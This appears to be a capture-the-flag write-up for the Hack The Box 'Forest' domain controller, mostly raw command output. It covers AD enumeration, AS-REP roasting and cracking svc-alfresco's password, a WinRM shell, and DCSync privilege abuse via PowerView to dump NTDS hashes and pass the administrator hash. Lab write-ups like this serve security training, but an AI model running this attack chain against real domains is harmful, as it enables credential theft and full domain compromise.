$ nmap -p- -T4 -A 10.10.10.161
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-14 11:29:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49918/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h39m16s, deviation: 4h02m31s, median: 19m15s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-07-14T04:30:50-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-14T11:30:47
|_ start_date: 2021-07-14T05:24:20
$ echo 10.10.10.161 forest.htb htb.local |sudo tee -a /etc/hosts
$ smbclient -N -L 10.10.10.161
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
$ nslookup
> server 10.10.10.161
Default server: 10.10.10.161
Address: 10.10.10.161#53
> htb.local
Server: 10.10.10.161
Address: 10.10.10.161#53
Name: htb.local
Address: 10.10.10.16
$ dig axfr htb.local @10.10.10.161
; <<>> DiG 9.16.15-Debian <<>> axfr htb.local @10.10.10.161
;; global options: +cmd
; Transfer failed.
$ rpcclient 10.10.10.161 -U '' -N
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[user] rid:[0x1db1]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
rpcclient $>
rpcclient $> enumdomains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain: HTB
Server:
Comment:
Total Users: 106
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $>
$ nullinux -shares 10.10.10.161
[*] Enumerating Shares for: 10.10.10.161
Shares Comments
-------------------------------------------
[-] No Shares Detected
$ nullinux -users 10.10.10.161
[*] Enumerating Domain Information for: 10.10.10.161
[+] Domain Name: HTB
[+] Domain SID: S-1-5-21-3072663084-364016917-1341370565
[*] Enumerating querydispinfo for: 10.10.10.161
$331000-VK4ADACQNUCA
Administrator
andy
DefaultAccount
Guest
HealthMailbox0659cc1
HealthMailbox670628e
HealthMailbox6ded678
HealthMailbox7108a4e
HealthMailbox83d6781
HealthMailbox968e74d
HealthMailboxb01ac64
HealthMailboxc0a90c9
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxfd87238
krbtgt
lucinda
mark
santi
sebastien
SM_1b41c9286325456bb
SM_1ffab36a2f5f479cb
SM_2c8eef0a09b545acb
SM_681f53d4942840e18
SM_75a538d3025e4db9a
SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549
SM_c75ee099d0a64c91b
SM_ca8c2ed5bdab4dc9b
svc-alfresco
user
[*] Enumerating enumdomusers for: 10.10.10.161
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi
user
[*] Enumerating LSA for: 10.10.10.161
[*] Performing RID Cycling for: 10.10.10.161
[*] Testing 10.10.10.161 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.161
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
[+] Group: Domain Users
[+] Group: Domain Guests
[+] Group: Domain Computers
[+] Group: Domain Controllers
[+] Group: Schema Admins
[+] Group: Enterprise Admins
[+] Group: Group Policy Creator Owners
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Organization Management
[+] Group: Recipient Management
[+] Group: View-Only Organization Management
[+] Group: Public Folder Management
[+] Group: UM Management
[+] Group: Help Desk
[+] Group: Records Management
[+] Group: Discovery Management
[+] Group: Server Management
[+] Group: Delegated Setup
[+] Group: Hygiene Management
[+] Group: Compliance Management
[+] Group: Security Reader
[+] Group: Security Administrator
[+] Group: Exchange Servers
[+] Group: Exchange Trusted Subsystem
[+] Group: Managed Availability Servers
[+] Group: Exchange Windows Permissions
[+] Group: ExchangeLegacyInterop
[+] Group: $D31000-NSEL5BRJ63V7
[+] Group: Service Accounts
[+] Group: Privileged IT Accounts
[+] Group: test
$ ldapsearch -h 10.10.10.161 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Exploitation — Kerberos ASREPRoast
Using impacket GetNPUsers.py enumerate Kerberos users who set DONT_REQUIRE_PREAUTH. This is a insecure configuration that allow user to authenticate without providing password. Therefore provide opportunity for hacker to send AS_REQ claiming to be any users and the DC would return AS_REP without verification. Since the AS_REP contains data that is encrypted by user hash, offline cracking can be performed to brute-force the hash and get user password.
$ GetNPUsers.py htb.local/ -no-pass -usersfile users.txt
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:bdb2015cc05e7bdf76b9b07529987c0c$9c1035a6f30dd20d92f401c27ca9dfbf6eeab8648314763ca13da31e343e4a9bac28a8991c51c0854add82dcc64343234ec1822eb53cd323d6e6f3015a00e6f0fa7e065a166558f15f88210964d8b5394cb72f747c32e4779886a23f70104ac07819b8af7444cbf19bfc624e9143351c238b104dabe403aa6cc4fa5c997e6d4ea2f27e14ab594c71c75cbb239e1d69267ca7222c33a8c308d7b13f95c85f8d997f8620f4ff5076407781bde0ba4baa6fed74d4500a130cb39a94b83bc6f3b65801e89d795ae756bfd7a0d271d3095511c9cc4a37b940a91519a8189944afe38e71e9ff3a5542
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User user doesn't have UF_DONT_REQUIRE_PREAUTH set
kali@kali:~/0.htb/machines/Forest161$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:03 DONE (2021-07-14 10:13) 0.3333g/s 1361Kp/s 1361Kc/s 1361KC/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/0.htb/machines/Forest161$ john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice
kali@kali:~/0.htb/machines/Forest161$ smbmap -H 10.10.10.161 -u svc-alfresco -p s3rvice
[+] IP: 10.10.10.161:445 Name: forest.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
kali@kali:~/0.htb/machines/Forest161$
$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47ae7022664cda6eb013fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/18/2019 10:09 AM Administrator
d-r--- 11/20/2016 6:39 PM Public
d----- 9/22/2019 3:29 PM sebastien
d----- 9/22/2019 4:02 PM svc-alfresco
*Evil-WinRM* PS C:\> net user
*Evil-WinRM* PS C:\> net user administrator
*Evil-WinRM* PS C:\> net user sebastien
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> upload winpeas.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> ./winpeas.exe >output.txt
Active Directory enumerate with SharpHound from BloodHound collector to collect data from the target.
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Downloads\SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> .\SharpHound.exe
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=htb,DC=local
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 21 MB RAM
Status: 125 objects finished (+125 62.5)/s -- Using 28 MB RAM
Enumeration finished in 00:00:02.4767994
Compressing data to .\20210714090327_BloodHound.zip
You can upload this file directly to the UI
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> download 20210714090327_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Downloads\20210714090327_BloodHound.zip to 20210714090327_BloodHound.zip
kali@kali:~/0.htb/machines/Forest161$ sudo neo4j start
kali@kali:~/0.htb/machines/Forest161$ bloodhound
Drag the zip data into the bloodhound GUI directly. go Menu -> find shortest pathes to domain admin. Mark the svc-alfresco as owned for convenience.
Follow the link and know that svc-alfresco is inherently the group member of Account Operators. Members ofAccount Operators have GenericALL privilege to EXCHANGE WINDOWS PERMISSIONS group which means “full control”.
And EXCHANGE WINDOWS PERMISSIONS group has the WriteDacl privilege to HTB.LOCAL domain.
Right click the WriteDacl link and click "Help”. It will explain how to abuse the privilege.
According to the description, we can abuse this WriteDacl privilege to grant any privilege to any object.
Go to the “Abuse Info” tab and it gives you an idea to abuse WriteDacl to grant the DcSync privilege.
'''
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.
You may need to authenticate to the Domain Controller as a member of EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL if you are not running a process as a member. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples comes from the PowerView help documentation):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Then, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL:
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync
Once you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain
lsadump::dcsync /domain:testlab.local /user:Administrator
Cleanup can be done using the Remove-DomainObjectAcl function:
Remove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync
'''
With DCSync privilege, we can impersonate the Domain Controller and dump all passwords hash from the NTDS.dit database which stores all Active Directory accounts.
Privilege Escalation — DCSync attack
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> . .\PowerView.ps1
Dot source the PowerView.ps1 such that we can use its functions.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user hacker hacker12345 /add
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "exchange windows permissions" /add hacker
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'hacker12345' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\hacker', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hacker -Credential $Cred -Rights DCSync
kali@kali:~/0.htb/machines/Forest161$ secretsdump.py hacker:hacker12345@10.10.10.161
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$ evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
*Evil-WinRM* PS C:\Users\Administrator\Documents>